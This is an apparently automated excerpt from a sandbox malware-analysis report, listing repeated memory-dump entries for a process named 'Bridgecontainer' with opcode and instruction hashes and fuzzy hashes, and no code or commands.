                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ad49b98bdec65f50562dc7f39ca5006a6e03a210b25b44c996daf241c3196c65
                  • Instruction ID: de49dd64c281743bc365e1de1256510aebddfec2bc0e0de556e86f3fc9fe2432
                  • Opcode Fuzzy Hash: ad49b98bdec65f50562dc7f39ca5006a6e03a210b25b44c996daf241c3196c65
                  • Instruction Fuzzy Hash: 7B814770D0C65A8FEBA9AB64A8597B9B6B0FF15340F0041BAD40DD22D2DF396984CB16
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5d0b329d4462636a9ba3bfeed72b89e0f02457cf5c44fdc6252e49695e231112
                  • Instruction ID: 79cd52226a7438fd2916b4f7f4a27287f3fe5d01a0a04ec17b3b36c389bb01b1
                  • Opcode Fuzzy Hash: 5d0b329d4462636a9ba3bfeed72b89e0f02457cf5c44fdc6252e49695e231112
                  • Instruction Fuzzy Hash: 4061F470D1CA5E8FEB94EBA898556FDBBA1FF59340F40017AD40DE3292EB3869448B44
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8de95c3fee4a8f9cacefee70292fcbdcac28e1d8af096402bcdd6e630468985c
                  • Instruction ID: 8cb374cbbc28cccbd4811d9b4ebdb110f097e13ebc63b42a5481d519d0df55c0
                  • Opcode Fuzzy Hash: 8de95c3fee4a8f9cacefee70292fcbdcac28e1d8af096402bcdd6e630468985c
                  • Instruction Fuzzy Hash: 9461E43191E78A8FE751BB78A8252FA7BB0FF06364F1405BBD448CA0D3DB295448C759
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ecbb9325f06b0fffb1c90d29c4f9be5b184204173ada5dacd9f9cffb3600d7b9
                  • Instruction ID: 47b9281048d1e5b3337b4b2c9ba4d5f2c333e7954e2b4a954898b8d6807dc5db
                  • Opcode Fuzzy Hash: ecbb9325f06b0fffb1c90d29c4f9be5b184204173ada5dacd9f9cffb3600d7b9
                  • Instruction Fuzzy Hash: 78714970D1D65A8FEB54EBA8C8956EDBBF0EF58340F50007AD049E62D2DF38A944CB18
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2de3907a450e129d4ba12643bfc137575a1197b7af908635eb281efcfbdf3593
                  • Instruction ID: fd1f14d6a746b92c92b1be34737947bfb5a1e435aab3ab37e5cc557f6a04983e
                  • Opcode Fuzzy Hash: 2de3907a450e129d4ba12643bfc137575a1197b7af908635eb281efcfbdf3593
                  • Instruction Fuzzy Hash: 0251F63661A6668FD301BB7CE4855E937B0FF85365F084677D088CE093DF2CA84987A9
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 87955c5be723f393ca97c08321f9b01dd35bf5ca50765db24f85ae37752d15a7
                  • Instruction ID: 8b0f4f3e74cfe5664cee24afb199bb9eead667a23d555e3ee8f964c9f2bc642d
                  • Opcode Fuzzy Hash: 87955c5be723f393ca97c08321f9b01dd35bf5ca50765db24f85ae37752d15a7
                  • Instruction Fuzzy Hash: DD51D370E1CA1D8EEB94EBA894957FDBBA1FF59340F40017AD00DE3282EF246D419B44
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c5a9b8febd40126cf1842ef8b520673d06a18818a0e6a958ec0b5741daa0697a
                  • Instruction ID: 7212ca1f8d73f0013701b5382a118cee600e72373b74487ca9f2e77575fc392b
                  • Opcode Fuzzy Hash: c5a9b8febd40126cf1842ef8b520673d06a18818a0e6a958ec0b5741daa0697a
                  • Instruction Fuzzy Hash: 1A419D31A18A594FDB48EF1888556BA73E2FBD8755F10467ED45AC3286CF30EC428785
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9c1c30f97b3a1b66f6e5555c561579b37bc8a62fb2bc624070b52e16f9f1ce0f
                  • Instruction ID: d7cd91447ac394b8156c3844e72708a7c82b4caad270dcd283d7dafdd6ec1c56
                  • Opcode Fuzzy Hash: 9c1c30f97b3a1b66f6e5555c561579b37bc8a62fb2bc624070b52e16f9f1ce0f
                  • Instruction Fuzzy Hash: 12518C3095E68A8FE752FBB488582FA7BE0EF16350F0405BAD408C60D2EB78A944C755
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0119b47683638667c9a26a704ee504015544d548e6d62b02d93c7bee464e3cfa
                  • Instruction ID: d387a9be6da45b2771b6f94cda849707be29100cfdc6c5ca8e4a1c7752e968af
                  • Opcode Fuzzy Hash: 0119b47683638667c9a26a704ee504015544d548e6d62b02d93c7bee464e3cfa
                  • Instruction Fuzzy Hash: 4A41CD31D1C64A9FEB68FB68E8156FEB7B0FF54390F04017AD00AD21C6EF2869058794
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4c278a538408c1865466eb4fc5ba128bacc8ae941ec0930b86fdc4ebb0caba26
                  • Instruction ID: 789ea11425a8bdb7f5f9c47e332be6c1a5a34d6314524d01ab82a6cb75f0e52d
                  • Opcode Fuzzy Hash: 4c278a538408c1865466eb4fc5ba128bacc8ae941ec0930b86fdc4ebb0caba26
                  • Instruction Fuzzy Hash: DC31683280D54A4FE755EBA898814E6B7E0FF91360F0402BBD448CB0E2EB3CAD4687D5
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: faf412373c9c5c35b80c6f97f5373f2845601e155b7cbfa63a7aa1e2e734be30
                  • Instruction ID: 36593f53dd02c2deb9896b6940a8e30aba9a8031bb3dc900e81d398041cf432a
                  • Opcode Fuzzy Hash: faf412373c9c5c35b80c6f97f5373f2845601e155b7cbfa63a7aa1e2e734be30
                  • Instruction Fuzzy Hash: 9A315427B1E1269AE65277ADB8114E96724EF917F9F040377D24CCD0D3EA1D388642BC
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c587e8e93656895d4d888e8025db10e4e9b5ce2d282b18c81649922b783a96f3
                  • Instruction ID: eb02cca40b7b1febbaa24e5520c65c0de561b93977164de741567321c1c18c50
                  • Opcode Fuzzy Hash: c587e8e93656895d4d888e8025db10e4e9b5ce2d282b18c81649922b783a96f3
                  • Instruction Fuzzy Hash: 33417F3081D68D8FDB96BF2488592F97BB0FF16301F4504BAD409C65E2DB386954C741
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6abc2055cd6ef0eaecdc1a4ff31eee58f1b307ab4571c592766d1658be18109f
                  • Instruction ID: 364141de796a8677b2918fb841216b402d27d2609229bbf3cb23db1fc4ebf514
                  • Opcode Fuzzy Hash: 6abc2055cd6ef0eaecdc1a4ff31eee58f1b307ab4571c592766d1658be18109f
                  • Instruction Fuzzy Hash: 07419F7181E7CA8FEB96BB2488292F97FB0EF06301F4504BBD848C64E2EB385954C741
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 013133bba4311c047b9bd730dbf7dcc80dce6ba4563ca25220244ef13854053a
                  • Instruction ID: e9a26e560d5340d6c0b5175c760e5d0ae3ea0c7a69bc099f999c54d2eca6daad
                  • Opcode Fuzzy Hash: 013133bba4311c047b9bd730dbf7dcc80dce6ba4563ca25220244ef13854053a
                  • Instruction Fuzzy Hash: 6441CF3090DA4A9FEB99EF68986A2B97BA0FF29341F0404BED409C21D2DF3A6544C745
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0641430cce6af209b8e1d57932a3c73e300614e5e8c719a0635251b4a2755ee2
                  • Instruction ID: a528a7bfbc8fa7a7c53342b2ff8cbddfe6d42c02a1d33a49ba5091cc30bf1e14
                  • Opcode Fuzzy Hash: 0641430cce6af209b8e1d57932a3c73e300614e5e8c719a0635251b4a2755ee2
                  • Instruction Fuzzy Hash: 83316D3081E7CA8FEB56EBB488681AA7FA0FF16341F0945BBD448C64D2EB389954C751
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ecaf52ebc41671577fad0f473381a093ee2f96e0781eb9ee87a13623adc7940f
                  • Instruction ID: 1529c79a5c6bf8368467d15feb6c53e5382aefc0d6916f749e2970c1f76853ec
                  • Opcode Fuzzy Hash: ecaf52ebc41671577fad0f473381a093ee2f96e0781eb9ee87a13623adc7940f
                  • Instruction Fuzzy Hash: DA419E3191D68A8FE752FBB488192FA7BE0EF15350F0405BAD408C61D6EB78AA54C745
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bd5821b9bccdbda9ce257a9979e63431952750106f47ff4f3e75667fe7b89c1e
                  • Instruction ID: 6ef1dcc3e7e28abaaa37f150dcfd6ddff327d1aaab79010915d21b9e55341dbc
                  • Opcode Fuzzy Hash: bd5821b9bccdbda9ce257a9979e63431952750106f47ff4f3e75667fe7b89c1e
                  • Instruction Fuzzy Hash: 49419D3081D78E8FEB56EFB488182AA7BE0FF19341F0444BAD409C74E2EB38A954C701
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 849ccd0bcb7a410a4089abc84916b372ffb7aafecb3bc0fa5369854d4e5911f2
                  • Instruction ID: 0bbb8768eeccb3fded63d301791031d495db313db53f9464b0d02fd559b99fd2
                  • Opcode Fuzzy Hash: 849ccd0bcb7a410a4089abc84916b372ffb7aafecb3bc0fa5369854d4e5911f2
                  • Instruction Fuzzy Hash: 5121AC32A1C51E8FEB98EB5CE8556FE77A0FF543A0F00013BE949D2281DB2868199794
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 54a0911dd77a36c22eb08ea1503547f4f72308fafe6c80af1f9ee8471620ce7f
                  • Instruction ID: 80d63860f735ae34ba7d85084531495e242d6d81169a5171a5af864e9d227a3a
                  • Opcode Fuzzy Hash: 54a0911dd77a36c22eb08ea1503547f4f72308fafe6c80af1f9ee8471620ce7f
                  • Instruction Fuzzy Hash: A021683092C64A8FEB52FB6498086EE77E0FF19341F444576C808C71D1EB38A6488B55
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7e7e6fc003e310984b0d5cb770d3aaac9dc7c6403c1312ba1397b4ba769b94dc
                  • Instruction ID: a4ad52e3dc3fdd27afc23bf7058fb8af1e8f7052c6bfb07323178b9544de5ba4
                  • Opcode Fuzzy Hash: 7e7e6fc003e310984b0d5cb770d3aaac9dc7c6403c1312ba1397b4ba769b94dc
                  • Instruction Fuzzy Hash: 6521A13081D68E8FEB55EBA488582AA7BE1FF19341F0405BAD409C75D2EB34A954C741
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e95a1b5e577270dced1cdb71ec670b1278355ed918b1bce9a174a03cb93b2ddd
                  • Instruction ID: 252b90b2f1dae7239fdc2db7d83fa0c173305d905b9a403d597ecb16b0556887
                  • Opcode Fuzzy Hash: e95a1b5e577270dced1cdb71ec670b1278355ed918b1bce9a174a03cb93b2ddd
                  • Instruction Fuzzy Hash: AB21B031E1D28A8FEB51FBE888192FA7BE0AF55340F04057AD408D61D6EB78AE14C755
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a6f488961a72c22c9daaaabeb8bea86692e6446e8d4ae45353ba9b4f7e62e0b9
                  • Instruction ID: 4196d91dbf5b758bac4458eab8a150be392d23febef9a0e0330ed50485d97565
                  • Opcode Fuzzy Hash: a6f488961a72c22c9daaaabeb8bea86692e6446e8d4ae45353ba9b4f7e62e0b9
                  • Instruction Fuzzy Hash: 5D11B43190D64A5FD356FB7898951E97BB0FF45351F0546B3D408CB0E3DB28A488C755
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0f4214810be11ec6b1521370425f7a9af3a6699986045da0546339b28b4deca7
                  • Instruction ID: ebacee73aceadfca38afc43cab3754a411523658f3631ebbdf2bcb59ab165da4
                  • Opcode Fuzzy Hash: 0f4214810be11ec6b1521370425f7a9af3a6699986045da0546339b28b4deca7
                  • Instruction Fuzzy Hash: 0D11D63081D78E8FEB55EF7488181BA3FA0FF15341F0404BAD408C65D2EB38A954C741
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 747817fe69330723ab31b7df4ed620bc1ce1401c2518695fe108fc07d766948b
                  • Instruction ID: c3f1cc94ede99a95a5e7813ab74025919ecfb7a434549b603fb4c1e4b0039a98
                  • Opcode Fuzzy Hash: 747817fe69330723ab31b7df4ed620bc1ce1401c2518695fe108fc07d766948b
                  • Instruction Fuzzy Hash: D811CE3090C68E8FEB89EF24C4696BA7BA1FF19340F1054BED40AC70D2DB35A894C745
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 549b497cffed3f766d1c8e2da1190130745059e6296263f6d541d203a34ed983
                  • Instruction ID: 6cd912511517b99cc9c42d45ad1f98e554feb97c72cc4363ee08a6f6d728f774
                  • Opcode Fuzzy Hash: 549b497cffed3f766d1c8e2da1190130745059e6296263f6d541d203a34ed983
                  • Instruction Fuzzy Hash: A011697090EA5E8FE791FB68885C6BABBE0FF19341F0409BAD408C70A1EB34A184D705
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 55afa2d67838f3a66e88c10d523b37a42e998d7534fd1513551913ad525f77fd
                  • Instruction ID: 1a5aed4c11b42527227b60e7c6d821cae65359e94ad4da028f1f5e16d73034f7
                  • Opcode Fuzzy Hash: 55afa2d67838f3a66e88c10d523b37a42e998d7534fd1513551913ad525f77fd
                  • Instruction Fuzzy Hash: 7601BC30D2C64B8FE745BB2898491FEBBB0FF44380F45057AD408D60D2EF3869458745
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 87c2e09896f378c2a22bffb9edeabffab348e7759a23dd431616482f68c2f5b8
                  • Instruction ID: a53aa0208e5d82d515f638a1f929bdd6a85afa62510f80aec7248973085823c4
                  • Opcode Fuzzy Hash: 87c2e09896f378c2a22bffb9edeabffab348e7759a23dd431616482f68c2f5b8
                  • Instruction Fuzzy Hash: 01018C30818A0E9FEB49FBA4C4586BA77A1FF18346F10087EE41EC29D1DF35A990C714
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ebc7679dac8efc5b5c486087cdcd58ce5880c268d968965e1fdb8dd069d4974b
                  • Instruction ID: e04f1032fcb8a2212d0145b32095a294e26541d12ca2478666b1c872c36db211
                  • Opcode Fuzzy Hash: ebc7679dac8efc5b5c486087cdcd58ce5880c268d968965e1fdb8dd069d4974b
                  • Instruction Fuzzy Hash: 6C016D30819A0E9FEB59EBA480592BD77A0FF28355F20047ED40EC21E1DF35A950CB04
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fbc8f1868e44946273c4ec80b36fc7c4364441ee09144b8da73e0ab808e1fc1b
                  • Instruction ID: a5a25bba5fb7aeed4b72ed5de17afcc2e57182668444ca07d9a322fe281f306e
                  • Opcode Fuzzy Hash: fbc8f1868e44946273c4ec80b36fc7c4364441ee09144b8da73e0ab808e1fc1b
                  • Instruction Fuzzy Hash: EB010870D1D21A8EDF50EF54C441AEEB7B1EB18350F14457AC009E2296DF38A9848B98
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5e09512d1332217a971dc66269fc3cec98e82fc1c4394d98275e950849109753
                  • Instruction ID: 503c0100ef7edbe34f9da1bc8ecf5cb092dd5e9e32690df92bda788689b0b804
                  • Opcode Fuzzy Hash: 5e09512d1332217a971dc66269fc3cec98e82fc1c4394d98275e950849109753
                  • Instruction Fuzzy Hash: 5FF0F831D5C52D8EEB54FBD4A8812FDB275FF95380F40107AD01EA60D2DF392D558A88
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d03114791f0985f401d4ee42eadedfdd592f5c0616099f0041fd9ab2ed312979
                  • Instruction ID: 6422015dd531bdb733cafc2216f0eedc07322fc69f6d051e31061a48ef48467e
                  • Opcode Fuzzy Hash: d03114791f0985f401d4ee42eadedfdd592f5c0616099f0041fd9ab2ed312979
                  • Instruction Fuzzy Hash: A4F0903080E78A8FEB59AFA484592A97BA0FF65351F5404BFE809C60E2DB389854C700
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2ee452f6e5ce77535f97f8444221e628e6a03ac4382f284e47ae7e29b51de862
                  • Instruction ID: 6813b9491942c8f1dad6a4bf19c45796a17572f1496e514eedc0e63e31f9166a
                  • Opcode Fuzzy Hash: 2ee452f6e5ce77535f97f8444221e628e6a03ac4382f284e47ae7e29b51de862
                  • Instruction Fuzzy Hash: 7DF01570908109CFDB44EF80C5506ED73F0EB18351F24016AD405E62D0DB79AE44CB18
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3b2316996bc5d19aae12d5e84fa929e4d4b6b719c63a057984b68b35543b1f1f
                  • Instruction ID: a0b552ba42b04fbc83ca4bfb7b3292c40ccf3371b723a68d0781f0547377144a
                  • Opcode Fuzzy Hash: 3b2316996bc5d19aae12d5e84fa929e4d4b6b719c63a057984b68b35543b1f1f
                  • Instruction Fuzzy Hash: A1E0EC32D5C52D8DEB54FBC1A4512FDB264AF65391F501036D01E961C2CF3D28159A98
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 713148493ab0b935906192515e40d3d3808fd5cad14e65ede91962a1e455251b
                  • Instruction ID: 2719d92acaf233c94bf69c11985ceed7367686815253bc920d8f2b1ba541cba2
                  • Opcode Fuzzy Hash: 713148493ab0b935906192515e40d3d3808fd5cad14e65ede91962a1e455251b
                  • Instruction Fuzzy Hash: F590022141A11295D2906D5464511D67270AF1025CB18463ED4C8080435A2C14804658